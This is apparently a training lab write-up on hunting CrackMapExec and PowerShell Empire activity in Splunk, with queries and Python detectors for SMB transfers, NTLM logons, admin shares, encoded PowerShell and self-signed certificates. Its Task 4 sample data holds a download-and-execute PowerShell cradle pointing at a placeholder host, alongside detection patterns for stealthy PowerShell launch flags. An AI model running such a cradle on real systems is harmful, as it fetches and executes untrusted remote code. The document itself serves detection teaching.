Goals: Crackmapexec

The IT Security manager has tasked you, the sole Threat hunter, to hunt for activity of the CrackMapExec framework using available logs. The tasks involve hunting for file transfers over SMB, connections between machines, access to admin shares, PowerShell activity, and self-signed certificates. Analyzing the logs using Splunk reveals activity matching CrackMapExec between two IP addresses.

The IT Security manager has now tasked you, the only Threat hunter, with performing a hunt for the offensive framework CrackMapExec. The internal penetration team has already generated CrackMapExec activity that will help you validate your hypotheses.

Zeek, Windows Security, Sysmon and PowerShell logs are available for this lab.

Goals
The learning objective of this lab is to increase familiarity with hands-on analysis in Splunk.

What you will learn

You will learn how to utilize available network and host-based logs to detect abnormal activity.

Recommended tools

Network Configuration
Splunk: 172.16.84.105

• Connection Type: Web (http://172.16.84.105:8000)

• Username: admin

• Password: eLSHunter
Tasks

Task 1. Have any files been transferred over SMB?

Begin by studying T1105 and create a detection search in Splunk.

Hint: Focus on Zeek logs, sourcetype "zeek_files" and sourcetype "zeek_smb_files" (specifically those with action of "SMB::FILE_OPEN"). For the most important fields please refer to https://docs.zeek.org/en/current/

Task 2. Has the suspected attacker machine connected to the victim?

Study T1187 and hunt for relevant activity that may link successful remote connections.

Hint: Focus on Zeek logs, sourcetype "zeek_ntlm".

Task 3. Have Windows admin shares been accessed remotely?

Study T1077 and hunt for relevant activity.

Hint: Focus on Zeek logs, sourcetype "zeek_smb_mapping".

Task 4. Has a PowerShell Empire agent been executed on the victim machine?

Hunt for PowerShell activity.

Hint: Focus on Sysmon and PowerShell logs for this hunt.


Task 5. Hunt for self-signed certificates
Hunt for self-signed certificates, since attackers usually utilize such certificates for convenience.

Hint: Focus on Zeek logs, sourcetype "zeek_ssl".

SOLUTIONS
Below, you can find solutions for each task. Remember, though, that you can follow your own strategy, which may differ from the one explained in the following lab.

Task 1. Have any files been transferred over SMB?

To identify a certain type of network traffic, we'll utilize Zeek's logs. The ones we are interested in for this task are those with sourcetype "zeek_files". Zeek logs also provide hashes for transferred files, so we should take this into account during our hunt as well. Utilizing that information, we construct the following query:

index=zeek sourcetype="zeek_files" SMB | spath "rx_hosts{}" | table rx_hosts{}, tx_hosts{}, filename, md5, sha1

Once the query is executed, we get the following match:

We can clearly see that some odd, 6-character, randomly named files were detected.

We can further enrich this by looking at Zeek logs with sourcetype "zeek_smb_files", and specifically those with action of "SMB::FILE_OPEN". We then construct the following query:

index=zeek sourcetype=zeek_smb_files action="SMB::FILE_OPEN" | table id.resp_h, id.resp_p, id.orig_h, id.orig_p, action, name

Once executed, we get the following match result:

Now we can see that those files were accessed remotely. From this we can suspect that 192.168.1.32 is the victim that connects to 192.168.1.34 on port 445.

The 6-character, randomly named filenames of shares are one of the distinguishing artefacts that are linked to CrackMapExec v4.0 and 5.0.
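
The same two-step hunt, written as an added Python example rather than as part of the lab: it reads Zeek's files.log and smb_files.log in JSON form, keeps SMB-sourced files whose names look like the random 6-character artefact, and joins each one to the SMB::FILE_OPEN record with the same fuid so the connection tuple and hashes land in one finding. The log lines, hashes and the six-letters-no-extension regex are constructed assumptions (the sample reuses the two lab addresses); this is not the lab's own query or CrackMapExec code.

```python
import json
import re
from typing import Dict, List, Optional

# Constructed Zeek JSON log lines (files.log and smb_files.log), not records from
# the lab's dataset. 192.168.1.34 writes files to 192.168.1.32 over SMB (tcp/445).
# Hash values are placeholders of the right length, not real digests.
ZEEK_FILES = """\
{"ts":1600000001.1,"fuid":"FaAAAA","tx_hosts":["192.168.1.34"],"rx_hosts":["192.168.1.32"],"source":"SMB","filename":"xQpLmZ","md5":"a1b2c3d4e5f60718293a4b5c6d7e8f90","sha1":"0123456789abcdef0123456789abcdef01234567"}
{"ts":1600000002.2,"fuid":"FbBBBB","tx_hosts":["192.168.1.34"],"rx_hosts":["192.168.1.32"],"source":"SMB","filename":"RtYhUi","md5":"b2c3d4e5f60718293a4b5c6d7e8f90a1","sha1":"123456789abcdef0123456789abcdef012345670"}
{"ts":1600000003.3,"fuid":"FcCCCC","tx_hosts":["192.168.1.10"],"rx_hosts":["192.168.1.32"],"source":"SMB","filename":"quarterly_report.xlsx","md5":"c3d4e5f60718293a4b5c6d7e8f90a1b2","sha1":"23456789abcdef0123456789abcdef0123456701"}
{"ts":1600000004.4,"fuid":"FdDDDD","tx_hosts":["203.0.113.10"],"rx_hosts":["192.168.1.32"],"source":"HTTP","filename":"index.html","md5":"d4e5f60718293a4b5c6d7e8f90a1b2c3","sha1":"3456789abcdef0123456789abcdef01234567012"}
"""

ZEEK_SMB_FILES = """\
{"ts":1600000001.0,"uid":"CfAAAA","id.orig_h":"192.168.1.34","id.orig_p":49812,"id.resp_h":"192.168.1.32","id.resp_p":445,"fuid":"FaAAAA","action":"SMB::FILE_OPEN","name":"xQpLmZ"}
{"ts":1600000002.0,"uid":"CfAAAA","id.orig_h":"192.168.1.34","id.orig_p":49812,"id.resp_h":"192.168.1.32","id.resp_p":445,"fuid":"FbBBBB","action":"SMB::FILE_OPEN","name":"RtYhUi"}
{"ts":1600000003.0,"uid":"CfBBBB","id.orig_h":"192.168.1.10","id.orig_p":50110,"id.resp_h":"192.168.1.32","id.resp_p":445,"fuid":"FcCCCC","action":"SMB::FILE_OPEN","name":"quarterly_report.xlsx"}
"""

# Assumption: the "random 6-character" artefact is six letters with no extension.
RANDOM_NAME = re.compile(r"^[A-Za-z]{6}$")


def parse_zeek_json(text: str) -> List[dict]:
    """Parse newline-delimited Zeek JSON, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a truncated line should not abort the whole hunt
    return records


def hunt_smb_file_transfers(files_log: str, smb_files_log: str) -> List[dict]:
    """Mirror the two lab queries: SMB-sourced files with random 6-char names,
    enriched with the SMB::FILE_OPEN connection that touched the same fuid."""
    opens: Dict[str, dict] = {
        r["fuid"]: r
        for r in parse_zeek_json(smb_files_log)
        if r.get("action") == "SMB::FILE_OPEN" and "fuid" in r
    }
    findings = []
    for rec in parse_zeek_json(files_log):
        if rec.get("source") != "SMB":
            continue
        name = rec.get("filename", "")
        if not RANDOM_NAME.match(name):
            continue
        conn: Optional[dict] = opens.get(rec.get("fuid", ""))
        findings.append({
            "filename": name,
            "md5": rec.get("md5"),
            "tx_host": (rec.get("tx_hosts") or [None])[0],
            "rx_host": (rec.get("rx_hosts") or [None])[0],
            # None when Zeek saw the file but logged no FILE_OPEN for that fuid
            "orig_h": conn["id.orig_h"] if conn else None,
            "resp_h": conn["id.resp_h"] if conn else None,
            "resp_p": conn["id.resp_p"] if conn else None,
        })
    return findings


if __name__ == "__main__":
    for f in hunt_smb_file_transfers(ZEEK_FILES, ZEEK_SMB_FILES):
        print(f"{f['orig_h']} -> {f['resp_h']}:{f['resp_p']}  {f['filename']}  md5={f['md5']}")
```

The join on fuid is what the second Splunk query leaves to the analyst's eye: files.log tells you what was transferred and its hashes, smb_files.log tells you which client opened it and on which share, and a file that matches the naming artefact but has no FILE_OPEN record is still reported (with empty connection fields) rather than silently dropped.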

Task 2. Has the suspected attacker machine connected to the victim?

For this task, we'll use Zeek logs again, specifically those with sourcetype "zeek_ntlm". Simply, we will list all logs in a defined table output format with the query:

index=zeek sourcetype=zeek_ntlm | table id.resp_h, id.resp_p, id.orig_h, id.orig_p, domainname, success, username

Once executed, we get the following:

We can see that 192.168.1.34 has connected successfully to 192.168.1.32 with the account "Administrator" (NTLM authentication, which is often generated by connecting remotely over SMB with a plain text password or by performing pass the hash).

Task 3. Have Windows admin shares been accessed remotely?

For this task, we'll look at Zeek logs again, specifically those with sourcetype "zeek_smb_mapping". Simply, we will list all logs in a defined table output format with the query:

index=zeek sourcetype="zeek_smb_mapping" | table id.resp_h, id.resp_p, id.orig_h, id.orig_p, path, share_type

Once executed, we get the following:

It appears that 192.168.1.34 has created multiple connections to the IPC$ share of 192.168.1.32. This is expected behavior when executing commands over SMB on a remote machine.
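
Tasks 2 and 3 are two views of the same lateral movement, so the added example below (Python written for this page, not the lab's queries) correlates them: successful NTLM logons from ntlm.log are grouped by (source, destination) pair and matched against smb_mapping.log records that touch ADMIN$, C$ or IPC$. A pair appears in the output only when both signals exist. The log lines, hostnames and the choice of "Administrator" as the privileged account name are constructed assumptions.

```python
import json
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed Zeek JSON lines for ntlm.log and smb_mapping.log, not the lab's
# records. Raw strings keep the UNC paths' backslashes exactly as Zeek emits them.
ZEEK_NTLM = r"""
{"ts":1600000010.0,"uid":"CnAAAA","id.orig_h":"192.168.1.34","id.orig_p":49813,"id.resp_h":"192.168.1.32","id.resp_p":445,"username":"Administrator","hostname":"ATTACKER","domainname":"WORKGROUP","success":true}
{"ts":1600000011.0,"uid":"CnBBBB","id.orig_h":"192.168.1.34","id.orig_p":49814,"id.resp_h":"192.168.1.32","id.resp_p":445,"username":"Administrator","hostname":"ATTACKER","domainname":"WORKGROUP","success":true}
{"ts":1600000012.0,"uid":"CnCCCC","id.orig_h":"192.168.1.34","id.orig_p":49815,"id.resp_h":"192.168.1.32","id.resp_p":445,"username":"backup","hostname":"ATTACKER","domainname":"WORKGROUP","success":false}
{"ts":1600000013.0,"uid":"CnDDDD","id.orig_h":"192.168.1.10","id.orig_p":50111,"id.resp_h":"192.168.1.20","id.resp_p":445,"username":"jsmith","hostname":"WS01","domainname":"CORP","success":true}
"""

ZEEK_SMB_MAPPING = r"""
{"ts":1600000010.1,"uid":"CnAAAA","id.orig_h":"192.168.1.34","id.orig_p":49813,"id.resp_h":"192.168.1.32","id.resp_p":445,"path":"\\\\192.168.1.32\\IPC$","share_type":"PIPE"}
{"ts":1600000010.2,"uid":"CnAAAA","id.orig_h":"192.168.1.34","id.orig_p":49813,"id.resp_h":"192.168.1.32","id.resp_p":445,"path":"\\\\192.168.1.32\\ADMIN$","share_type":"DISK"}
{"ts":1600000011.1,"uid":"CnBBBB","id.orig_h":"192.168.1.34","id.orig_p":49814,"id.resp_h":"192.168.1.32","id.resp_p":445,"path":"\\\\192.168.1.32\\IPC$","share_type":"PIPE"}
{"ts":1600000011.2,"uid":"CnBBBB","id.orig_h":"192.168.1.34","id.orig_p":49814,"id.resp_h":"192.168.1.32","id.resp_p":445,"path":"\\\\192.168.1.32\\IPC$","share_type":"PIPE"}
{"ts":1600000013.1,"uid":"CnDDDD","id.orig_h":"192.168.1.10","id.orig_p":50111,"id.resp_h":"192.168.1.20","id.resp_p":445,"path":"\\\\FILESRV\\Projects","share_type":"DISK"}
"""

# The three administrative shares the T1077/T1021.002 hunt cares about.
ADMIN_SHARE = re.compile(r"\\(ADMIN\$|C\$|IPC\$)$", re.I)

Pair = Tuple[str, str]  # (id.orig_h, id.resp_h)


def _records(text: str) -> List[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def successful_ntlm_logons(ntlm_log: str) -> Dict[Pair, List[str]]:
    """(source, destination) -> usernames that authenticated successfully over NTLM."""
    logons: Dict[Pair, List[str]] = defaultdict(list)
    for r in _records(ntlm_log):
        if r.get("success") is True and "username" in r:
            logons[(r["id.orig_h"], r["id.resp_h"])].append(r["username"])
    return logons


def admin_share_mappings(mapping_log: str) -> Dict[Pair, Dict[str, int]]:
    """(source, destination) -> {share name: mapping count}, admin shares only."""
    shares: Dict[Pair, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for r in _records(mapping_log):
        m = ADMIN_SHARE.search(r.get("path", ""))
        if m:
            shares[(r["id.orig_h"], r["id.resp_h"])][m.group(1).upper()] += 1
    return shares


def correlate(ntlm_log: str, mapping_log: str,
              privileged=("administrator",)) -> List[dict]:
    """Pairs with both a successful NTLM logon and an admin-share mapping.
    `privileged` (an assumption) marks which account names deserve extra weight."""
    logons = successful_ntlm_logons(ntlm_log)
    shares = admin_share_mappings(mapping_log)
    findings = []
    for pair in sorted(set(logons) & set(shares)):
        users = sorted(set(logons[pair]))
        findings.append({
            "orig_h": pair[0],
            "resp_h": pair[1],
            "ntlm_successes": len(logons[pair]),
            "usernames": users,
            "privileged": any(u.lower() in privileged for u in users),
            "admin_shares": dict(shares[pair]),
        })
    return findings


if __name__ == "__main__":
    for f in correlate(ZEEK_NTLM, ZEEK_SMB_MAPPING):
        print(f"{f['orig_h']} -> {f['resp_h']}: {f['usernames']} shares={f['admin_shares']}")
```

The workstation that maps a normal file share after a successful NTLM logon never surfaces, because its path does not end in one of the three admin shares; the repeated IPC$ mappings from the attacker, which the lab calls expected for remote command execution, show up as a count per share so that the analyst can see the pattern rather than a single boolean.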

Task 4. Has a PowerShell Empire agent been executed on the victim machine?

For this task, we'll utilize Sysmon logs, specifically to check whether a process was started with a suspicious command line argument that contains "powershell", which is generated by default by Empire agents. We will use the following query to search for "powershell":

index=* powershell

Once executed, among a list of matched events, we'll see this one:

If we go forward and decode the obfuscated command, we will indeed note that this matches Empire's stager.

We could also look into PowerShell ScriptBlock logs with Event ID 4104, which display captured PowerShell activity. A simple query looking for those that contain "Warning" already provides a wealth of potentially malicious obfuscated commands:
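
The "decode the obfuscated command" step above is manual in the lab; the added Python example below (written for this page, not the lab's query nor Empire's code) automates it for Sysmon Event ID 1 records: it finds the -EncodedCommand argument in any of its accepted spellings, base64-decodes it as UTF-16LE, and scores the event on launch flags (-NoP, -NonI, -W Hidden, -Exec Bypass, -Enc) plus content markers in the decoded text (IEX, Net.WebClient, FromBase64String). The events, the download-cradle string with its placeholder URL and the indicator lists are constructed assumptions; the JSON field names (EventCode, Computer, Image, CommandLine) are assumed to match how the SIEM stores Sysmon events.

```python
import base64
import binascii
import json
import re
from typing import List, Optional


def encode_for_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon Event ID 1 (process creation) records as JSON lines, not
# the lab's events. The first command line is built from a generic download
# cradle with a placeholder URL so that the sample is guaranteed to decode.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/a')"
_BENIGN = "Write-Output 'nightly inventory finished'"
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SYSMON_EVENTS = "\n".join(json.dumps(e) for e in [
    {"EventCode": 1, "Computer": "VICTIM-PC", "Image": _PS,
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_for_powershell(_CRADLE)},
    {"EventCode": 1, "Computer": "VICTIM-PC", "Image": _PS,
     "CommandLine": "powershell.exe -EncodedCommand " + encode_for_powershell(_BENIGN)},
    {"EventCode": 1, "Computer": "VICTIM-PC", "Image": _PS,
     "CommandLine": "powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\inventory.ps1"},
    {"EventCode": 1, "Computer": "VICTIM-PC", "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
])

# -e, -ec, -enc and -encodedcommand are all accepted spellings of the switch.
ENCODED_ARG = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Launch-time indicators matched on the raw command line (label -> pattern).
LAUNCH_FLAGS = {
    "noprofile": r"(?<!\S)-nop(?:rofile)?\b",
    "noninteractive": r"(?<!\S)-noni(?:nteractive)?\b",
    "hidden-window": r"(?<!\S)-w(?:indowstyle)?\s+hidden\b",
    "exec-bypass": r"(?<!\S)-exec(?:utionpolicy)?\s+bypass\b",
    "encoded-command": ENCODED_ARG.pattern,
}
# Content indicators matched on the raw line and on the decoded script.
CONTENT_MARKERS = {
    "iex": r"\biex\b|invoke-expression",
    "web-download": r"net\.webclient|downloadstring|downloadfile",
    "base64-decode": r"frombase64string",
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # malformed argument: the flag itself is still scored below


def analyze_command_line(cmdline: str) -> dict:
    """Decode if needed and list every indicator hit; score is the hit count."""
    decoded = decode_encoded_command(cmdline)
    indicators = [k for k, p in LAUNCH_FLAGS.items() if re.search(p, cmdline, re.I)]
    haystack = cmdline + "\n" + (decoded or "")
    indicators += [k for k, p in CONTENT_MARKERS.items() if re.search(p, haystack, re.I)]
    return {"decoded": decoded, "indicators": indicators, "score": len(indicators)}


def hunt_powershell_events(jsonl: str, min_score: int = 2) -> List[dict]:
    """Score every process-creation event whose command line mentions powershell."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        cmd = ev.get("CommandLine", "")
        if ev.get("EventCode") != 1 or "powershell" not in cmd.lower():
            continue
        result = analyze_command_line(cmd)
        if result["score"] >= min_score:
            findings.append({"computer": ev.get("Computer"), "command_line": cmd, **result})
    return findings


if __name__ == "__main__":
    for f in hunt_powershell_events(SYSMON_EVENTS):
        print(f"{f['computer']} score={f['score']} {f['indicators']}\n  decoded: {f['decoded']}")
```

Scoring rather than matching on "-enc" alone matters for the false-positive rate: the second sample event is a legitimately encoded maintenance command and scores 1, while the stager-like event scores on every launch flag and on the decoded content. The same analyze_command_line function can be pointed at the ScriptBlockText of Event ID 4104 records, where the script is already in clear text and only the content markers apply.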

Task 5. Hunt for self-signed certificates

An interesting indicator of compromise is the existence of self-signed SSL certificates in your environment (of course, your organization will have to adopt using certificates signed by trusted entities for this hunting technique to be meaningful).

The below Splunk search can reveal self-signed SSL certificates or certificates with multiple empty fields. Both can be used as an alarm.

index=zeek sourcetype=zeek_ssl | table cipher, curve, client_cert_chain_fuids, client_issuer, client_subject, C, version, subject, validation_status

If you look carefully enough, you will identify that the self-signed certificate is related to the attacking host we found during the previous tasks!
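
The Splunk search above leaves the "look carefully" part to the analyst; the added Python example below (written for this page, not the lab's query) applies the two alarms the text names to Zeek ssl.log records: a validation_status of "self signed certificate" or a subject identical to the issuer, and a subject DN with more than one empty attribute. Resumed sessions that carry no certificate are skipped rather than flagged. The log lines are constructed (the suspicious listeners reuse the lab's attacker address; the legitimate server uses a TEST-NET address), and the DN parser assumes the comma-separated "CN=...,O=..." form Zeek prints, with no escaped commas.

```python
import json
from collections import Counter
from typing import Dict, List

# Constructed Zeek ssl.log JSON lines, not records from the lab's dataset.
# validation_status is what Zeek's validate-certs policy script fills in.
ZEEK_SSL = """\
{"ts":1600000020.0,"uid":"CsAAAA","id.orig_h":"192.168.1.32","id.orig_p":51000,"id.resp_h":"203.0.113.10","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","server_name":"www.example.com","subject":"CN=www.example.com,O=Example Corp,L=Springfield,C=US","issuer":"CN=Example Issuing CA,O=Example Trust Services,C=US","validation_status":"ok"}
{"ts":1600000021.0,"uid":"CsBBBB","id.orig_h":"192.168.1.32","id.orig_p":51001,"id.resp_h":"192.168.1.34","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","curve":"secp256r1","subject":"CN=localhost,O=Internet Widgits Pty Ltd,ST=Some-State,C=AU","issuer":"CN=localhost,O=Internet Widgits Pty Ltd,ST=Some-State,C=AU","validation_status":"self signed certificate"}
{"ts":1600000022.0,"uid":"CsCCCC","id.orig_h":"192.168.1.32","id.orig_p":51002,"id.resp_h":"192.168.1.34","id.resp_p":8443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","subject":"CN=,O=,L=,ST=,C=","issuer":"CN=,O=,L=,ST=,C=","validation_status":"self signed certificate"}
{"ts":1600000023.0,"uid":"CsDDDD","id.orig_h":"192.168.1.32","id.orig_p":51003,"id.resp_h":"203.0.113.10","id.resp_p":443,"version":"TLSv12","cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","curve":"secp256r1","resumed":true}
"""


def parse_dn(dn: str) -> Dict[str, str]:
    """Split 'CN=a,O=b' into {'CN': 'a', 'O': 'b'} (naive: assumes no escaped commas)."""
    out: Dict[str, str] = {}
    for part in dn.split(","):
        if "=" in part:
            key, value = part.split("=", 1)
            out[key.strip().upper()] = value.strip()
    return out


def empty_dn_fields(dn: str) -> List[str]:
    return [k for k, v in parse_dn(dn).items() if v == ""]


def certificate_findings(ssl_log: str, max_empty: int = 1) -> List[dict]:
    """Flag self-signed certificates and subjects with more than max_empty blank attributes."""
    findings = []
    for r in (json.loads(l) for l in ssl_log.splitlines() if l.strip()):
        subject, issuer = r.get("subject"), r.get("issuer")
        if subject is None or issuer is None:
            continue  # resumed session or no certificate observed: nothing to judge
        reasons = []
        status = r.get("validation_status", "")
        if "self signed" in status:
            reasons.append("validation_status: " + status)
        if subject == issuer:
            reasons.append("subject equals issuer")
        empties = empty_dn_fields(subject)
        if len(empties) > max_empty:
            reasons.append("empty subject fields: " + ",".join(empties))
        if reasons:
            findings.append({"resp_h": r["id.resp_h"], "resp_p": r["id.resp_p"],
                             "subject": subject, "reasons": reasons})
    return findings


def by_server(findings: List[dict]) -> Dict[str, int]:
    """Count findings per responding host, to line them up with the hosts from earlier tasks."""
    return dict(Counter(f["resp_h"] for f in findings))


if __name__ == "__main__":
    found = certificate_findings(ZEEK_SSL)
    for f in found:
        print(f"{f['resp_h']}:{f['resp_p']}  {f['subject']}  {f['reasons']}")
    print(by_server(found))
```

The subject-equals-issuer check is deliberately kept alongside validation_status, because the latter is only populated when the validate-certs script is loaded; the per-server count is the hand-off to the earlier tasks, where the same responding address already showed up as the source of the NTLM logons and admin-share mappings.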

KEY TAKEAWAYS
1. Robust detection rules are required to perform high quality hunts.

2. Combining network and host-based activity provides greater visibility into the actions performed and helps to identify adversary actions that may be hard (or impossible) to identify by looking at only one source.
